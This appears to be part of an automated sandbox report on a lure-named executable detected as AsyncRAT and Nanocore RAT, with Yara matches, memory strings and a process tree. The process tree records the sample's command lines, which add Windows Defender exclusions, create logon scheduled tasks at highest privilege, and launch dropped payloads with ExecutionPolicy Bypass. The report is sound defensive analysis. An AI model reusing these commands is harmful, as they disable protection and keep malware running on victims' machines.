                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: mozille.exe, mozille.exe, 0000000F.00000000.372058011.0000000000F12000.00000002.00020000.sdmpString found in binary or memory: http://www.gimp.org/windows/
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: mozille.exe, mozille.exe, 0000000F.00000000.372058011.0000000000F12000.00000002.00020000.sdmpString found in binary or memory: http://www.pcgamingboards.com/smf/index.php?topic=129.msg279#msg279
                  Source: mozille.exeString found in binary or memory: http://www.radgametools.com/bnkdown.htm
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
                  Source: mozille.exeString found in binary or memory: http://www.totalbf2142.com/forums/showthread.php?t=5342
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: mozille.exeString found in binary or memory: https://sourceforge.net/project/showfiles.php?group_id=181663
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000000.294283178.0000000000392000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000005.00000000.327586416.0000000000162000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000000.333928558.0000000000582000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000002.361685768.0000000003B04000.00000004.00000001.sdmp, mozille.exe, 0000000E.00000000.362803086.0000000000262000.00000002.00020000.sdmp, mozille.exe, 0000000F.00000000.372058011.0000000000F12000.00000002.00020000.sdmpString found in binary or memory: https://sourceforge.net/project/showfiles.php?group_id=181663Mhttp://igaeditor.sourceforge.net/wiki/
                  Source: mozille.exeString found in binary or memory: https://sourceforge.net/svn/?group_id=181663

                  Key, Mouse, Clipboard, Microphone and Screen Capturing:

                  barindex
                  Yara detected AsyncRATShow sources
                  Source: Yara matchFile source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.RFQ_GGMC-Ref 12-01-2022.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.12.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ_GGMC-Ref 12-01-2022.exe.277261c.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.mozille.exe.26c25b0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000015.00000002.564363154.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000000.335571895.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000000.389862678.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000000.390327325.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000003.453796076.00000000056C5000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000000.335001041.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.359864523.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000000.388653976.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000000.334452217.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000000.333878908.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.338424053.0000000002701000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000000.390769248.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000002.571714369.00000000031A1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.393670309.0000000002651000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RFQ_GGMC-Ref 12-01-2022.exe PID: 6964, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RFQ_GGMC-Ref 12-01-2022.exe PID: 6948, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: mozille.exe PID: 6316, type: MEMORYSTR
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.337721695.0000000000A48000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                  E-Banking Fraud:

                  barindex
                  Yara detected Nanocore RATShow sources
                  Source: Yara matchFile source: 00000028.00000000.532162937.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000000.533503527.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000002.575326002.0000000003B89000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000000.534610587.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000000.531340924.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000002.578385897.0000000005530000.00000004.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.539866646.00000000043B9000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000002.564500309.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000002.572373638.0000000002B81000.00000004.00000001.sdmp, type: MEMORY

                  System Summary:

                  barindex
                  Malicious sample detected (through community Yara rule)Show sources
                  Source: 00000028.00000002.578366682.0000000005520000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                  Source: 00000028.00000000.532162937.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                  Source: 00000028.00000000.532162937.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 00000028.00000000.533503527.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                  Source: 00000028.00000000.533503527.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 00000028.00000002.575326002.0000000003B89000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 00000028.00000000.534610587.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                  Source: 00000028.00000000.534610587.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 00000028.00000000.531340924.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                  Source: 00000028.00000000.531340924.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 00000028.00000002.578385897.0000000005530000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                  Source: 00000021.00000002.539866646.00000000043B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                  Source: 00000021.00000002.539866646.00000000043B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 00000028.00000002.564500309.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                  Source: 00000028.00000002.564500309.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 00000028.00000002.572373638.0000000002B81000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                  Source: RFQ_GGMC-Ref 12-01-2022.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                  Source: 00000028.00000002.578366682.0000000005520000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                  Source: 00000028.00000002.578366682.0000000005520000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 00000028.00000000.532162937.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                  Source: 00000028.00000000.532162937.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                  Source: 00000028.00000000.533503527.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                  Source: 00000028.00000000.533503527.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                  Source: 00000028.00000002.575326002.0000000003B89000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                  Source: 00000028.00000000.534610587.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                  Source: 00000028.00000000.534610587.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                  Source: 00000028.00000000.531340924.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                  Source: 00000028.00000000.531340924.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                  Source: 00000028.00000002.578385897.0000000005530000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                  Source: 00000028.00000002.578385897.0000000005530000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 00000021.00000002.539866646.00000000043B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                  Source: 00000021.00000002.539866646.00000000043B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                  Source: 00000028.00000002.564500309.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                  Source: 00000028.00000002.564500309.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                  Source: 00000028.00000002.572373638.0000000002B81000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeCode function: 0_2_00A3E721
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeCode function: 0_2_00A3E730
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeCode function: 0_2_00A3C764
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeCode function: 14_2_00C1C764
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeCode function: 14_2_00C1E721
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeCode function: 14_2_00C1E730
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeCode function: 14_2_04F87ABC
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeCode function: 14_2_04F8827B
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeCode function: 15_2_01A0E721
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeCode function: 15_2_01A0E730
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeCode function: 15_2_01A0C764
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.337279816.000000000041E000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIDescriptionMetadataEnt.exeH vs RFQ_GGMC-Ref 12-01-2022.exe
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.338424053.0000000002701000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameStub.exe" vs RFQ_GGMC-Ref 12-01-2022.exe
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.337721695.0000000000A48000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs RFQ_GGMC-Ref 12-01-2022.exe
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.338715728.0000000003709000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dllF vs RFQ_GGMC-Ref 12-01-2022.exe
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000005.00000002.328182607.00000000001EE000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIDescriptionMetadataEnt.exeH vs RFQ_GGMC-Ref 12-01-2022.exe
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000000.333072613.000000000060E000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIDescriptionMetadataEnt.exeH vs RFQ_GGMC-Ref 12-01-2022.exe
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000000.334476834.000000000040E000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameStub.exe" vs RFQ_GGMC-Ref 12-01-2022.exe
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000002.361685768.0000000003B04000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameIDescriptionMetadataEnt.exeH vs RFQ_GGMC-Ref 12-01-2022.exe
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000002.360214785.0000000000CEA000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs RFQ_GGMC-Ref 12-01-2022.exe
                  Source: RFQ_GGMC-Ref 12-01-2022.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: lhWbLvHNlciwu.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: RFQ_GGMC-Ref 12-01-2022.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: lhWbLvHNlciwu.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: RFQ_GGMC-Ref 12-01-2022.exeVirustotal: Detection: 26%
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeFile read: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeJump to behavior
                  Source: RFQ_GGMC-Ref 12-01-2022.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: unknownProcess created: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe "C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe"
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lhWbLvHNlciwu" /XML "C:\Users\user\AppData\Local\Temp\tmp71CD.tmp
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess created: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess created: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "mozille" /tr '"C:\Users\user\AppData\Local\Temp\mozille.exe"' & exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpB8D1.tmp.bat""
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "mozille" /tr '"C:\Users\user\AppData\Local\Temp\mozille.exe"'
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\mozille.exe C:\Users\user\AppData\Local\Temp\mozille.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\mozille.exe "C:\Users\user\AppData\Local\Temp\mozille.exe"
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lhWbLvHNlciwu" /XML "C:\Users\user\AppData\Local\Temp\tmpCDE7.tmp
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess created: C:\Users\user\AppData\Local\Temp\mozille.exe C:\Users\user\AppData\Local\Temp\mozille.exe
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jzhlgt.exe"' & exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jzhlgt.exe"'
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\jzhlgt.exe "C:\Users\user\AppData\Local\Temp\jzhlgt.exe"
                  Source: C:\Users\user\AppData\Local\Temp\jzhlgt.exeProcess created: C:\Users\user\AppData\Local\Temp\jzhlgt.exe C:\Users\user\AppData\Local\Temp\jzhlgt.exe
                  Source: C:\Users\user\AppData\Local\Temp\jzhlgt.exeProcess created: C:\Users\user\AppData\Local\Temp\jzhlgt.exe C:\Users\user\AppData\Local\Temp\jzhlgt.exe
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\dlliok.exe"' & exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\dlliok.exe"'
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\dlliok.exe "C:\Users\user\AppData\Local\Temp\dlliok.exe"
                  Source: C:\Users\user\AppData\Local\Temp\dlliok.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pLrWNKFD.exe
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\dlliok.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pLrWNKFD" /XML "C:\Users\user\AppData\Local\Temp\tmp9C7F.tmp
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\dlliok.exeProcess created: C:\Users\user\AppData\Local\Temp\dlliok.exe C:\Users\user\AppData\Local\Temp\dlliok.exe
                  Source: C:\Users\user\AppData\Local\Temp\dlliok.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpAD4.tmp
